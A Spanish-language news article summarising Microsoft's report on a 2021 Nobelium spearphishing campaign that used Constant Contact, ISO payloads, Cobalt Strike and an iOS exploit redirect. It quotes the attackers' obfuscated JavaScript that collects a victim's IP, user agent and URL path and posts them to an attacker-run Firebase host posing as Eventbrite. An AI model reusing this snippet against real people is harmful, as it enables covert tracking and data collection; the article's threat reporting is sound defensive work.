Nuevo y sofisticado spearphishing de Nobelium

Nobelium APT hace referencia al threat actor o grupo de hackers que estuvieron detrás del reciente y conocidísimo ciberataque de tipo supply chain hacia Solarwinds. Lo han vuelto a hacer, ahora se ha descubierto una importante operación de envío de correos fraudulentos, como informa Microsoft.

Nobelium no solo es responsable del ataque a la cadena de suministro de Solarwinds (backdoor SUNBURST), sino además del malware TEARDROP y de los troyanos Goldmax, Sibot y Goldfinger.

Este grupo de hackers se especializa en ciberataques contra organizaciones gubernamentales y no-gubernamentales, entidades militares, think-tanks, proveedores de servicios TI, sector de salud, telecomunicaciones…

Campaña de phishing de quienes atacaron Solarwinds

Esta campaña ha sido monitorizada por parte de Microsoft, siendo descubierta en Enero de 2021, evolucionando durante el tiempo, y quedando patente la experimentación a través de diferentes oleadas de scam a través del email.

Desde el día 25 de Mayo de 2021, los expertos observaron un importante cambio en la campaña, ya que comenzaron a valerse de servicio gratuito Constant Contact, con el objeto de hacerse pasar por una organización con base en EEUU y lanzar su campaña de malspam.

En la imagen inferior se puede ver el contenido de la imagen ISO: un archivo PDF, un archivo LNK (link o enlace) llamado Reports y un archivo DLL llamado documentos, que estaba oculto por defecto.

Sus múltiples caras

La campaña de phishing más reciente detectada por Microsoft fue más ruidosa de lo normal, dado el alto volumen de correo electrónico enviado. La mayoría del cual fue satisfactoriamente bloqueado mediante sistemas de seguridad de correo automáticos.

En ella se empleaba -según el informe MSTIC de Microsoft– la plataforma Google Firebase para proporcionar un archivo ISO que contenía el código malicioso.

Esta campaña comienza el 28 de Enero, cuando se realiza un reconocimiento por parte de los delincuentes, enviando únicamente la porción del email que contiene el tracking, aprovechando las URL de Firebase para recordar aquellos usuarios que lo clicaron.

No se entrega ningún tipo de payload durante esta etapa temprana. Ejemplo del código Firebase utilizado para el reconocimiento previo al ataque.

try {
let sdfgfghj = '';
let kjhyui = new XMLHttpRequest();
kjhyui.open('GET', 'https://api.ipify.org/?format=jsonp?callback=?', false);
kjhyui.onreadystatechange = function (){
sdfgfghj = this.responseText;
}
kjhyui.send(null);
let ioiolertsfsd = navigator.userAgent;
let uyio = window.location.pathname.replace('/','');
var ctryur = {'io':ioiolertsfsd,'tu':uyio,'sd':sdfgfghj};
ctryur = JSON.stringify(ctryur);
let sdfghfgh = new XMLHttpRequest();
sdfghfgh.open('POST', 'https://eventbrite-com-default-rtdb.firebaseio.com/root.json', false);
sdfghfgh.setRequestHeader('Content-Type', 'application/json');
sdfghfgh.send(ctryur);
} catch (e) {}

Además, se descubrió que los hackers empleaban ataques que no hacían uso de la ISO de Firebase, sino en su lugar codificaban el malware directamente en el documento HTML.

El actor experimentó con la redirección del documento HTML hacia una ISO que contenía un documento de texto enriquecido (RTF), con la librería Colbalt Strike Beacon DLL codificada en el mismo documento.

En un ejemplo final de experimentación, no había HTML alguno acompañando al email con el Phishing. En su lugar se incluía una URL que derivaba en una web independiente que suplantaba a las organizaciones objetivo, desde donde se distribuía la ISO.

Informe MSTIC

Por otro lado, se utilizaba una versión en que los atacantes no se valían del payload contenido en la ISO, sino que adoptaron técnicas de perfilado. En caso de que la víctima tuviera un dispositivo Apple iOS, era redirigida a un servidor distinto (bajo el control de NOBELIUM), que intentaba aprovechar la vulnerabilidad CVE-2021-1879.

Y por último, ya desde Mayo de 2021 los atacantes comenzaron a desplegar un implante personalizado de .NET que actuaba en la atapa temprana del ataque, ( TrojanDownloader:MSIL/BoomBox), empleado para labores de reconocimiento y descargar payload adicionales.

Ya hace poco más de una semana (25/05/2021) la campaña se volvió muy agresiva, usando el servicio citado de Constant Contact para envkiar correo fraudulento a más de 3000 usurios en 150 organizaciones diferentes.

Al ser un volumen realmente grande, los sistemas de seguridad en correo electrónico fueron capaces de bloquear y poner en lista negra a la mayoría de intentos.

Más información sobre IOCs y mapeo MITRE ATT&CK en la web de Microsoft.